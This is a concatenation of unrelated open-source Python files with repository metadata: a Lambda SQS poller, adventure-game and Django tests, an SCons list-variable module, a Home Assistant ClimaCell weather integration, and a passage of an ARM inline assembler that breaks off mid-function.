main_loop.set_default_executor(executor)
asyncio.set_event_loop(main_loop)
poll = Poll(main_loop)
cal = poll.cal
update_and_delete = UpdateAndDelete(main_loop, executor)
table = event['table']
queue_url = event['queueUrl']
message_count = event['messageCount']
poll.messages(sqs, queue_url, message_count)
logger.info("Receive API count: {}".format(poll.fetch_count))
logger.info("Fetched messages: {}".format(poll.message_count))
update_and_delete.execute(sqs_client, db, queue_url, table, cal.stats)
logger.info("Update API count: {}".format(update_and_delete.update_count))
logger.info("Delete API count: {}".format(update_and_delete.delete_count))
logger.info("Delete Message count: {}".format(
update_and_delete.deleted_message_count))
main_loop.close()
executor.shutdown()
return "Lambda job finished successfully."
|
{
"content_hash": "1615e7c29c5fa638350d0821d8c0e886",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 78,
"avg_line_length": 30.12727272727273,
"alnum_prop": 0.7272178636089318,
"repo_name": "yxd-hde/lambda-poll-update-delete",
"id": "b3b2bfec36f67e2dcd641e18424d141248427f60",
"size": "1657",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py-asyncio-boto3/main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "8069"
},
{
"name": "Makefile",
"bytes": "980"
},
{
"name": "Python",
"bytes": "25797"
},
{
"name": "Shell",
"bytes": "144"
}
],
"symlink_target": ""
}
|
"""Test suite.
Copyright 2010-2015 Brandon Rhodes. Licensed as free software under the
Apache License, Version 2.0 as detailed in the accompanying README.txt.
"""
from unittest import TestCase
from adventure import load_advent_dat
from adventure.game import Game
class CommandTest(TestCase):
def setUp(self):
game = Game()
load_advent_dat(game)
self.words = set(w.synonyms[0].text for w in game.vocabulary.values())
self.words.remove('suspend')
def test_intransitive_commands_should_not_throw_exceptions(self):
for word in self.words:
game = Game()
load_advent_dat(game)
game.start()
game.do_command(['no']) # WOULD YOU LIKE INSTRUCTIONS?
game.do_command([word])
def test_transitive_commands_should_not_throw_exceptions(self):
for word in self.words:
game = Game()
load_advent_dat(game)
game.start()
game.do_command(['no']) # WOULD YOU LIKE INSTRUCTIONS?
game.do_command(['enter']) # so we are next to lamp
game.do_command([word, 'lamp'])
|
{
"content_hash": "0ae2e751dafe1d6e64763c36474ae79d",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 78,
"avg_line_length": 33.55882352941177,
"alnum_prop": 0.6222611744084137,
"repo_name": "devinmcgloin/advent",
"id": "beaba30a2884f06d8f5678006758f2095889e294",
"size": "1141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "adventure/tests/test_commands.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "21560"
},
{
"name": "HTML",
"bytes": "1081"
},
{
"name": "Python",
"bytes": "99935"
}
],
"symlink_target": ""
}
|
"""Tests for voot application."""
from unittest import TestCase
from django.test import TestCase as DjangoTestCase
class TestSuiteTestCase(TestCase):
"""General test to make sure that the setup works."""
def test_test_suite_can_be_run(self):
self.assertTrue(True)
class ExampleTestCase(DjangoTestCase):
"""Tests for Example model class."""
fixtures = ['test_data']
urls = 'voot.tests.urls'
def test_example_view_is_callable(self):
resp = self.client.get('/example/')
self.assertEqual(resp.status_code, 200)
|
{
"content_hash": "838db65026f15304dad8d70437de88da",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 57,
"avg_line_length": 28.05,
"alnum_prop": 0.6898395721925134,
"repo_name": "berggren/django-voot",
"id": "5b4e6f8428bedfbc4683eddfabb8c753ed49f413",
"size": "561",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "voot/tests/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "3343"
}
],
"symlink_target": ""
}
|
"""engine.SCons.Variables.ListVariable
This file defines the option type for SCons implementing 'lists'.
A 'list' option may either be 'all', 'none' or a list of names
separated by comma. After the option has been processed, the option
value holds either the named list elements, all list elemens or no
list elements at all.
Usage example:
list_of_libs = Split('x11 gl qt ical')
opts = Variables()
opts.Add(ListVariable('shared',
'libraries to build as shared libraries',
'all',
elems = list_of_libs))
...
for lib in list_of_libs:
if lib in env['shared']:
env.SharedObject(...)
else:
env.Object(...)
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Variables/ListVariable.py issue-2856:2676:d23b7a2f45e8 2012/08/05 15:38:28 garyo"
# Know Bug: This should behave like a Set-Type, but does not really,
# since elements can occur twice.
__all__ = ['ListVariable',]
import collections
import SCons.Util
class _ListVariable(collections.UserList):
def __init__(self, initlist=[], allowedElems=[]):
collections.UserList.__init__(self, [_f for _f in initlist if _f])
self.allowedElems = sorted(allowedElems)
def __cmp__(self, other):
raise NotImplementedError
def __eq__(self, other):
raise NotImplementedError
def __ge__(self, other):
raise NotImplementedError
def __gt__(self, other):
raise NotImplementedError
def __le__(self, other):
raise NotImplementedError
def __lt__(self, other):
raise NotImplementedError
def __str__(self):
if len(self) == 0:
return 'none'
self.data.sort()
if self.data == self.allowedElems:
return 'all'
else:
return ','.join(self)
def prepare_to_store(self):
return self.__str__()
def _converter(val, allowedElems, mapdict):
"""
"""
if val == 'none':
val = []
elif val == 'all':
val = allowedElems
else:
val = [_f for _f in val.split(',') if _f]
val = [mapdict.get(v, v) for v in val]
notAllowed = [v for v in val if not v in allowedElems]
if notAllowed:
raise ValueError("Invalid value(s) for option: %s" %
','.join(notAllowed))
return _ListVariable(val, allowedElems)
## def _validator(key, val, env):
## """
## """
## # todo: write validater for pgk list
## return 1
def ListVariable(key, help, default, names, map={}):
"""
The input parameters describe a 'package list' option, thus they
are returned with the correct converter and validater appended. The
result is usable for input to opts.Add() .
A 'package list' option may either be 'all', 'none' or a list of
package names (separated by space).
"""
names_str = 'allowed names: %s' % ' '.join(names)
if SCons.Util.is_List(default):
default = ','.join(default)
help = '\n '.join(
(help, '(all|none|comma-separated list of names)', names_str))
return (key, help, default,
None, #_validator,
lambda val: _converter(val, names, map))
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
{
"content_hash": "3ae8bc77a2bdd06b4e569b09386f5d39",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 114,
"avg_line_length": 33.266666666666666,
"alnum_prop": 0.6432865731462926,
"repo_name": "angad/libjingle-mac",
"id": "0763b29c465ccc570dbec74f3b462e5c5c553d00",
"size": "4491",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "scons-2.2.0/build/lib/SCons/Variables/ListVariable.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "2015946"
},
{
"name": "C++",
"bytes": "9306077"
},
{
"name": "Objective-C",
"bytes": "28091"
},
{
"name": "Perl",
"bytes": "50523"
},
{
"name": "Python",
"bytes": "4283804"
},
{
"name": "Shell",
"bytes": "1445083"
}
],
"symlink_target": ""
}
|
"""Weather component that handles meteorological data for your location."""
from datetime import datetime
import logging
from typing import Any, Callable, Dict, List, Optional
from homeassistant.components.weather import (
ATTR_FORECAST_CONDITION,
ATTR_FORECAST_PRECIPITATION,
ATTR_FORECAST_PRECIPITATION_PROBABILITY,
ATTR_FORECAST_TEMP,
ATTR_FORECAST_TEMP_LOW,
ATTR_FORECAST_TIME,
ATTR_FORECAST_WIND_BEARING,
ATTR_FORECAST_WIND_SPEED,
WeatherEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
LENGTH_FEET,
LENGTH_KILOMETERS,
LENGTH_METERS,
LENGTH_MILES,
PRESSURE_HPA,
PRESSURE_INHG,
TEMP_FAHRENHEIT,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.sun import is_up
from homeassistant.helpers.typing import HomeAssistantType
from homeassistant.util import dt as dt_util
from homeassistant.util.distance import convert as distance_convert
from homeassistant.util.pressure import convert as pressure_convert
from . import ClimaCellDataUpdateCoordinator, ClimaCellEntity
from .const import (
CC_ATTR_CONDITION,
CC_ATTR_HUMIDITY,
CC_ATTR_OZONE,
CC_ATTR_PRECIPITATION,
CC_ATTR_PRECIPITATION_DAILY,
CC_ATTR_PRECIPITATION_PROBABILITY,
CC_ATTR_PRESSURE,
CC_ATTR_TEMPERATURE,
CC_ATTR_TEMPERATURE_HIGH,
CC_ATTR_TEMPERATURE_LOW,
CC_ATTR_TIMESTAMP,
CC_ATTR_VISIBILITY,
CC_ATTR_WIND_DIRECTION,
CC_ATTR_WIND_SPEED,
CLEAR_CONDITIONS,
CONDITIONS,
CONF_TIMESTEP,
CURRENT,
DAILY,
DEFAULT_FORECAST_TYPE,
DOMAIN,
FORECASTS,
HOURLY,
NOWCAST,
)
# mypy: allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
def _translate_condition(
condition: Optional[str], sun_is_up: bool = True
) -> Optional[str]:
"""Translate ClimaCell condition into an HA condition."""
if not condition:
return None
if "clear" in condition.lower():
if sun_is_up:
return CLEAR_CONDITIONS["day"]
return CLEAR_CONDITIONS["night"]
return CONDITIONS[condition]
def _forecast_dict(
hass: HomeAssistantType,
forecast_dt: datetime,
use_datetime: bool,
condition: str,
precipitation: Optional[float],
precipitation_probability: Optional[float],
temp: Optional[float],
temp_low: Optional[float],
wind_direction: Optional[float],
wind_speed: Optional[float],
) -> Dict[str, Any]:
"""Return formatted Forecast dict from ClimaCell forecast data."""
if use_datetime:
translated_condition = _translate_condition(condition, is_up(hass, forecast_dt))
else:
translated_condition = _translate_condition(condition, True)
if hass.config.units.is_metric:
if precipitation:
precipitation = (
distance_convert(precipitation / 12, LENGTH_FEET, LENGTH_METERS) * 1000
)
if wind_speed:
wind_speed = distance_convert(wind_speed, LENGTH_MILES, LENGTH_KILOMETERS)
data = {
ATTR_FORECAST_TIME: forecast_dt.isoformat(),
ATTR_FORECAST_CONDITION: translated_condition,
ATTR_FORECAST_PRECIPITATION: precipitation,
ATTR_FORECAST_PRECIPITATION_PROBABILITY: precipitation_probability,
ATTR_FORECAST_TEMP: temp,
ATTR_FORECAST_TEMP_LOW: temp_low,
ATTR_FORECAST_WIND_BEARING: wind_direction,
ATTR_FORECAST_WIND_SPEED: wind_speed,
}
return {k: v for k, v in data.items() if v is not None}
async def async_setup_entry(
hass: HomeAssistantType,
config_entry: ConfigEntry,
async_add_entities: Callable[[List[Entity], bool], None],
) -> None:
"""Set up a config entry."""
coordinator = hass.data[DOMAIN][config_entry.entry_id]
entities = [
ClimaCellWeatherEntity(config_entry, coordinator, forecast_type)
for forecast_type in [DAILY, HOURLY, NOWCAST]
]
async_add_entities(entities)
class ClimaCellWeatherEntity(ClimaCellEntity, WeatherEntity):
"""Entity that talks to ClimaCell API to retrieve weather data."""
def __init__(
self,
config_entry: ConfigEntry,
coordinator: ClimaCellDataUpdateCoordinator,
forecast_type: str,
) -> None:
"""Initialize ClimaCell weather entity."""
super().__init__(config_entry, coordinator)
self.forecast_type = forecast_type
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
if self.forecast_type == DEFAULT_FORECAST_TYPE:
return True
return False
@property
def name(self) -> str:
"""Return the name of the entity."""
return f"{super().name} - {self.forecast_type.title()}"
@property
def unique_id(self) -> str:
"""Return the unique id of the entity."""
return f"{super().unique_id}_{self.forecast_type}"
@property
def temperature(self):
"""Return the platform temperature."""
return self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_TEMPERATURE)
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_FAHRENHEIT
@property
def pressure(self):
"""Return the pressure."""
pressure = self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_PRESSURE)
if self.hass.config.units.is_metric and pressure:
return pressure_convert(pressure, PRESSURE_INHG, PRESSURE_HPA)
return pressure
@property
def humidity(self):
"""Return the humidity."""
return self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_HUMIDITY)
@property
def wind_speed(self):
"""Return the wind speed."""
wind_speed = self._get_cc_value(
self.coordinator.data[CURRENT], CC_ATTR_WIND_SPEED
)
if self.hass.config.units.is_metric and wind_speed:
return distance_convert(wind_speed, LENGTH_MILES, LENGTH_KILOMETERS)
return wind_speed
@property
def wind_bearing(self):
"""Return the wind bearing."""
return self._get_cc_value(
self.coordinator.data[CURRENT], CC_ATTR_WIND_DIRECTION
)
@property
def ozone(self):
"""Return the O3 (ozone) level."""
return self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_OZONE)
@property
def condition(self):
"""Return the condition."""
return _translate_condition(
self._get_cc_value(self.coordinator.data[CURRENT], CC_ATTR_CONDITION),
is_up(self.hass),
)
@property
def visibility(self):
"""Return the visibility."""
visibility = self._get_cc_value(
self.coordinator.data[CURRENT], CC_ATTR_VISIBILITY
)
if self.hass.config.units.is_metric and visibility:
return distance_convert(visibility, LENGTH_MILES, LENGTH_KILOMETERS)
return visibility
@property
def forecast(self):
"""Return the forecast."""
# Check if forecasts are available
if not self.coordinator.data[FORECASTS].get(self.forecast_type):
return None
forecasts = []
# Set default values (in cases where keys don't exist), None will be
# returned. Override properties per forecast type as needed
for forecast in self.coordinator.data[FORECASTS][self.forecast_type]:
forecast_dt = dt_util.parse_datetime(
self._get_cc_value(forecast, CC_ATTR_TIMESTAMP)
)
use_datetime = True
condition = self._get_cc_value(forecast, CC_ATTR_CONDITION)
precipitation = self._get_cc_value(forecast, CC_ATTR_PRECIPITATION)
precipitation_probability = self._get_cc_value(
forecast, CC_ATTR_PRECIPITATION_PROBABILITY
)
temp = self._get_cc_value(forecast, CC_ATTR_TEMPERATURE)
temp_low = None
wind_direction = self._get_cc_value(forecast, CC_ATTR_WIND_DIRECTION)
wind_speed = self._get_cc_value(forecast, CC_ATTR_WIND_SPEED)
if self.forecast_type == DAILY:
use_datetime = False
forecast_dt = dt_util.start_of_local_day(forecast_dt)
precipitation = self._get_cc_value(
forecast, CC_ATTR_PRECIPITATION_DAILY
)
temp = next(
(
self._get_cc_value(item, CC_ATTR_TEMPERATURE_HIGH)
for item in forecast[CC_ATTR_TEMPERATURE]
if "max" in item
),
temp,
)
temp_low = next(
(
self._get_cc_value(item, CC_ATTR_TEMPERATURE_LOW)
for item in forecast[CC_ATTR_TEMPERATURE]
if "min" in item
),
temp_low,
)
elif self.forecast_type == NOWCAST:
# Precipitation is forecasted in CONF_TIMESTEP increments but in a
# per hour rate, so value needs to be converted to an amount.
if precipitation:
precipitation = (
precipitation / 60 * self._config_entry.options[CONF_TIMESTEP]
)
forecasts.append(
_forecast_dict(
self.hass,
forecast_dt,
use_datetime,
condition,
precipitation,
precipitation_probability,
temp,
temp_low,
wind_direction,
wind_speed,
)
)
return forecasts
|
{
"content_hash": "426b637939de7e8c5fd9ea2c7525a82f",
"timestamp": "",
"source": "github",
"line_count": 300,
"max_line_length": 93,
"avg_line_length": 33.263333333333335,
"alnum_prop": 0.6094799078063934,
"repo_name": "partofthething/home-assistant",
"id": "e5a24197d6bad12df9257d026a5597b6d98a47a0",
"size": "9979",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/climacell/weather.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1720"
},
{
"name": "Python",
"bytes": "31051838"
},
{
"name": "Shell",
"bytes": "4832"
}
],
"symlink_target": ""
}
|
"""ARM inline assembler.
This module allows creation of new functions in ARM assembler
(machine language) which can be directly called from Python.
The assembler syntax parsed by this module follows as closely as practical
the offical ARM syntax
"""
from functools import partial as _partial
import re as _re
import ctypes as _ctypes
from ctypes.util import find_library as _find_library
class AssemblerError(Exception):
"""Exception thrown when a syntax error is encountered in the assembler code."""
pass
_registers = dict(("r%d" % _i, _i) for _i in range(16))
# register name synonyms
for _i in range(4):
_registers["a%d" % (_i + 1)] = _registers["r%d" % _i]
for _i in range(8):
_registers["v%d" % (_i + 1)] = _registers["r%d" % (_i + 4)]
_registers["sb"] = _registers["r9"]
_registers["ip"] = _registers["r12"]
_registers["sp"] = _registers["r13"]
_registers["lr"] = _registers["r14"]
_registers["pc"] = _registers["r15"]
_status_registers = {"cpsr" : 0, "spsr" : 1}
_conditions = [
"eq", "ne", "cs", "cc",
"mi", "pl", "vs", "vc",
"hi", "ls", "ge", "lt",
"gt", "le", "", "nv"]
class _InstructionFormat:
format_fields = {
"0" : 1,
"1" : 1,
"A" : 1,
"B" : 1,
"c" : 1,
"x" : 1,
"s" : 1,
"f" : 1,
"CPNum" : 4,
"CRd" : 4,
"CRm" : 4,
"CRn" : 4,
"Cond" : 4,
"H" : 1,
"I" : 1,
"Imm24" : 24,
"L" : 1,
"N" : 1,
"Offset" : 0,
"Offset1" : 4,
"Offset2" : 4,
"Op1" : 0,
"Op2" : 3,
"Opcode" : 4,
"Operand2" : 12,
"P" : 1,
"Rd" : 4,
"RdHi" : 4,
"RdLo" : 4,
"RegisterList" : 16,
"R" : 1,
"Rm" : 4,
"Rn" : 4,
"Rs" : 4,
"S" : 1,
"Shift" : 3,
"U" : 1,
"W" : 1,
}
def __init__(self, format, length=32):
self.format = format
self.length = length
format = format.split()[::-1]
leftover = length - sum(self.format_fields[f] for f in format)
bit = 0
base = 0
mask = 0
offset = 0
fields = {}
for f in format:
bits = self.format_fields[f]
if bits == 0:
bits = leftover
if f == "1":
base = base + (1 << offset)
if f in "01":
mask = mask + (1 << offset)
else:
fields[f] = (offset, bits)
offset = offset + bits
assert offset == length
self.base = base
self.mask = mask
self.fields = fields
self.signature = " ".join(sorted(fields.keys()))
def match(self, n):
return (n & self.mask) == self.base
def encode(self, fields):
if len(fields) != len(self.fields):
missing = set(self.fields.keys()) - set(fields.keys())
if missing:
raise ValueError("Missing fields: " + " ".join(missing))
spurious = set(fields.keys()) - set(self.fields.keys())
raise ValueError("Spurious fields: " + " ".join(spurious))
base = self.base
for f in fields:
offset, bits = self.fields[f]
value = fields[f]
mask = (1 << bits) - 1
base = base | ((value & mask) << offset)
return base
class _ShiftSpec:
allowed_immediates = dict([(i, i % 32) for i in range(1, 33)])
def __init__(self, number, allowed_immediates=None, register_allowed=True):
self.number = number
if allowed_immediates is not None:
self.allowed_immediates = allowed_immediates
self.register_allowed = register_allowed
_shifts = {
"lsl" : _ShiftSpec(0, allowed_immediates=dict([(_i,_i) for _i in range(32)])),
"lsr" : _ShiftSpec(2),
"asr" : _ShiftSpec(4),
"ror" : _ShiftSpec(6, allowed_immediates=dict([(_i,_i) for _i in range(1, 32)])),
"rrx" : _ShiftSpec(6, allowed_immediates={1:0}, register_allowed=False)
}
_shifts["asl"] = _shifts["lsl"]
_comma_split_re = _re.compile(r"(?:(?:\[[^\]]*\])|(?:{[^}]*})|(?:\$.)|[^,])+|.")
def _comma_split(str):
return [item.strip() for item in _comma_split_re.findall(str) if item != ',']
class _OperandParser:
pc = 0
labels = {}
constant_pool_offset = 0
instruction = None
operand2_format = _InstructionFormat("Offset Shift Rm", 12)
library_cache = {}
memory_re = _re.compile(r"^\[(.*)\]\s*(!?)$")
regset_re = _re.compile(r"^{(.*)}$")
special_chars = {"space" : ord(' '), "newline" : ord('\n'), "tab" : ord('\t')}
control_flags = frozenset("cxsf")
def __init__(self, libraries):
self.constant_pool = []
self.constant_pool_dict = {}
self.libraries = [self.convert_library(lib) for lib in libraries]
def error(self, message):
instruction = self.instruction
full_message = "%s\nLine %d: %s" % (message, instruction.linenumber, instruction.code)
error = AssemblerError(full_message)
error.linenumber = instruction.linenumber
error.code = instruction.code
error.message = message
raise error
def convert_library(self, lib):
library_cache = self.library_cache
if isinstance(lib, str):
if lib not in library_cache:
library_cache[lib] = _ctypes.CDLL(_find_library(lib))
return library_cache[lib]
else:
return lib
def get_constant_pool_address(self, constant):
if constant in self.constant_pool_dict:
return self.constant_pool_dict[constant]
address = self.constant_pool_offset
self.constant_pool_offset = self.constant_pool_offset + 1
self.constant_pool.append(constant)
self.constant_pool_dict[constant] = address
return address
def lookup_symbol(self, str):
for lib in self.libraries:
try:
return _ctypes.cast(getattr(lib, str), _ctypes.c_void_p).value
except AttributeError:
pass
return None
def encode_immediate(self, n, checked=True):
r = 0
b = n & 0xFFFFFFFF
while r < 16:
if b < 256:
return (r << 8) | b
r = r + 1
b = ((b << 2) | (b >> 30)) & 0xFFFFFFFF # rotate left by two bits
if checked:
self.error("Immediate value cannot be assembled: %d" % n)
else:
return None
def encode_ldr_immediate(self, n, checked=True):
if n >= 0 and n < (1 << 12):
return n
elif checked:
self.error("Immediate offset cannot be assembled: %d" % n)
else:
return None
def parse_immediate(self, str, checked=False, prefix="#"):
if str and str[0] == prefix:
str = str[1:].strip()
try:
return int(str, base=0)
except ValueError:
pass
if str and str[0] == '$':
ch = str[1:]
if len(ch) == 1:
return ord(ch)
elif ch in self.special_chars:
return self.special_chars[ch]
result = self.lookup_symbol(str)
if checked and result is None:
self.error("Expected immediate value, got: %s" % str)
else:
return result
def parse_memory(self, str):
mo = self.memory_re.match(str)
if mo is None:
self.error("Expected memory location, got: %s" % str)
return [s.strip() for s in _comma_split(mo.group(1))], mo.group(2)
def parse_register(self, str, checked=False):
reg = _registers.get(str.lower(), None)
if reg is None and checked:
self.error("Expected register, got: %s" % str)
else:
return reg
def parse_status_register(self, str):
reg = _status_registers.get(str.lower(), None)
if reg is None:
self.error("Expected CPSR or SPSR, got: %s" % str)
else:
return reg
def parse_status_register_flags(self, str):
fields = str.split('_', 1)
if len(fields) == 2:
R = self.parse_status_register(fields[0])
flags = set(fields[1].lower())
if flags.issubset(self.control_flags):
flags = {f : 1 if f in flags else 0 for f in self.control_flags}
return (R, flags)
self.error("Expected CPSR_flags or SPSR_flags, got: %s % str")
def parse_regset(self, str):
mo = self.regset_re.match(str)
if mo is not None:
str = mo.group(1)
result = set()
for r in _comma_split(str):
r = r.strip()
r = r.split("-", 1)
if len(r) == 1:
result.add(self.parse_register(r[0].strip()))
else:
r1, r2 = r
r1 = self.parse_register(r1.strip(), checked=True)
r2 = self.parse_register(r2.strip(), checked=True)
result.update(range(min(r1, r2), max(r1, r2) + 1))
return result
def parse_signed_register(self, str, checked=False):
U = 1
if str and str[0] == "-":
U = 0
str = str[1:].strip()
return self.parse_register(str, checked), U
def parse_shift(self, str, allow_registers=True):
shift = str[:3]
shift_field = str[3:].strip()
try:
shift_spec = _shifts[shift.lower()]
except KeyError:
self.error("Expected shift, got: %s" % str)
if allow_registers and shift_spec.register_allowed:
shift_value = self.parse_register(shift_field)
if shift_value is not None:
return (shift_spec.number + 1, shift_value << 1)
shift_value = self.parse_immediate(shift_field, checked=True)
if shift_value in shift_spec.allowed_immediates:
return (shift_spec.number, shift_spec.allowed_immediates[shift_value])
else:
self.error("Shift with value of %d is not allowed" % shift_value)
self.error("Expected shift, got: %s" % str)
def parse_operand2(self, operands, encode_imm, allow_shift_register=True):
if len(operands) == 0:
return {"I":1, "Operand2": 0, "U": 1}
elif len(operands) == 1:
Rm, U = self.parse_signed_register(operands[0])
if Rm is not None:
return {"I":0, "Operand2": Rm, "U": U}
imm = self.parse_immediate(operands[0])
if imm is not None:
U = 1
encoded_imm = encode_imm(imm, checked=False)
if encoded_imm is None:
U = 0
encoded_imm = encode_imm(-imm, checked=False)
if encoded_imm is None:
encode_imm(imm, checked=True) # cause error
return {"I":1, "Operand2": encoded_imm, "U": U}
self.error("Expected register or immediate, got: %s" % operands[0])
elif len(operands) == 2:
Rm, U = self.parse_signed_register(operands[0], checked=True)
t, c = self.parse_shift(operands[1], allow_shift_register)
operand2 = self.operand2_format.encode({"Shift" : t, "Offset" : c, "Rm" : Rm})
return {"I":0, "Operand2": operand2, "U": U}
def parse_dpi_operand2(self, operands):
fields = self.parse_operand2(operands, self.encode_immediate)
if fields["U"] == 0:
self.error("Minus sign (-) not allowed in this instruction")
del fields["U"]
return fields
def parse_load_store(self, operands):
W = 0
if len(operands) == 1:
pre_indexed = 1
operands, bang = self.parse_memory(operands[0])
if bang:
W = 1
else:
pre_indexed = 0
operands0, bang = self.parse_memory(operands[0])
if len(operands0) != 1:
self.error("Expected [register], got: %s" % operands[0])
if bang:
self.error("In post-indexed _mode, ! is not allowed")
operands = operands0 + operands[1:]
fields = self.parse_operand2(operands[1:], self.encode_ldr_immediate, allow_shift_register=False)
fields["P"] = pre_indexed
fields["W"] = W
fields["I"] = 1 - fields["I"]
fields["Rn"] = self.parse_register(operands[0], checked=True)
return fields
_instructions = {}
class _Instruction:
code = ""
label = ""
opcode = ""
operands = []
linenumber = 0
pc = 0
def __init__(self, code):
self.code = code
code = code.split(";", 1)[0]
code = code.split(":", 1)
if len(code) == 1:
code = code[0]
else:
self.label = code[0].strip()
code = code[1]
code = code.strip()
if code:
code = code.split(None, 1)
self.opcode = code[0].strip().lower()
if len(code) > 1:
self.operands = _comma_split(code[1])
def parse(self, parser):
parser.instruction = self
parser.pc = self.pc
if self.opcode not in _instructions:
parser.error("Invalid opcode: %s" % self.opcode)
return _instructions[self.opcode](parser, self.operands)
_dpi_format = _InstructionFormat("Cond 0 0 I Opcode S Rn Rd Operand2")
_branch_format = _InstructionFormat("Cond 1 0 1 L Offset")
_bx_format = _InstructionFormat("Cond 0 0 0 1 0 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 0 0 L 1 Rm")
_load_store_format = _InstructionFormat("Cond 0 1 I P U B W L Rn Rd Operand2")
_load_store_multi_format = _InstructionFormat("Cond 1 0 0 P U S W L Rn RegisterList")
_mul_format = _InstructionFormat("Cond 0 0 0 0 0 0 0 S Rd 0 0 0 0 Rs 1 0 0 1 Rm")
_mla_format = _InstructionFormat("Cond 0 0 0 0 0 0 1 S Rd Rn Rs 1 0 0 1 Rm")
_clz_format = _InstructionFormat("Cond 0 0 0 1 0 1 1 0 1 1 1 1 Rd 1 1 1 1 0 0 0 1 Rm")
_mrs_format = _InstructionFormat("Cond 0 0 0 1 0 R 0 0 1 1 1 1 Rd 0 0 0 0 0 0 0 0 0 0 0 0")
_msr_format_reg = _InstructionFormat("Cond 0 0 0 1 0 R 1 0 f s x c 1 1 1 1 0 0 0 0 0 0 0 0 Rm")
_msr_format_imm = _InstructionFormat("Cond 0 0 1 1 0 R 1 0 f s x c 1 1 1 1 Operand2")
_swi_format = _InstructionFormat("Cond 1 1 1 1 Imm24")
def _parse_dpi(opcode, condition, s, parser, operands):
if len(operands) not in (3, 4):
parser.error("Expected 3 or 4 arguments, got %d" % len(operands))
fields = parser.parse_dpi_operand2(operands[2:])
Rd = parser.parse_register(operands[0], checked=True)
Rn = parser.parse_register(operands[1], checked=True)
fields["Rd"] = Rd
fields["Rn"] = Rn
fields["Opcode"] = opcode
fields["Cond"] = condition
fields["S"] = s
return _dpi_format.encode(fields)
def _parse_move(opcode, condition, s, parser, operands):
if len(operands) not in (2, 3):
parser.error("Expected 2 or 3 arguments, got %d" % len(operands))
fields = parser.parse_dpi_operand2(operands[1:])
Rd = parser.parse_register(operands[0], checked=True)
fields["Rd"] = Rd
fields["Rn"] = 0
fields["Opcode"] = opcode
fields["Cond"] = condition
fields["S"] = s
return _dpi_format.encode(fields)
def _parse_cond(opcode, condition, s, parser, operands):
if len(operands) not in (2, 3):
parser.error("Expected 2 or 3 arguments, got %d" % len(operands))
fields = parser.parse_dpi_operand2(operands[1:])
Rn = parser.parse_register(operands[0], checked=True)
fields["Rd"] = 0
fields["Rn"] = Rn
fields["Opcode"] = opcode
fields["Cond"] = condition
fields["S"] = s
return _dpi_format.encode(fields)
def _parse_branch(condition, link, parser, operands):
if len(operands) != 1:
parser.error("Expected 1 argument, got %d" % len(operands))
label = operands[0]
if label not in parser.labels:
parser.error("Undefined label: %s" % label)
target = parser.labels[label]
offset = target - parser.pc - 2
return _branch_format.encode({"L" : link, "Cond" : condition, "Offset" : offset})
def _parse_bx(condition, link, parser, operands):
if len(operands) != 1:
parser.error("Expected 1 argument, got %d" % len(operands))
Rm = parser.parse_register(operands[0], checked=True)
return _bx_format.encode({"L" : link, "Cond" : condition, "Rm" : Rm})
def _parse_load_store(condition, load, B, parser, operands):
if len(operands) not in (2, 3, 4):
parser.error("Expected 2, 3 or 4 arguments, got %d" % len(operands))
Rd = parser.parse_register(operands[0], checked=True)
fields = parser.parse_load_store(operands[1:])
fields["Rd"] = Rd
fields["L"] = load
fields["B"] = B
fields["Cond"] = condition
return _load_store_format.encode(fields)
def _parse_load_store_multi(condition, load, before, increment, parser, operands):
if len(operands) != 2:
parser.error("Expected 2 arguments, got %d" % len(operands))
W = 0
S = 0
operand0 = operands[0]
if operand0 and operand0[-1] == '!':
W = 1
operand0 = operand0[:-1].strip()
operand1 = operands[1]
if operand1 and operand1[-1] == '^':
S = 1
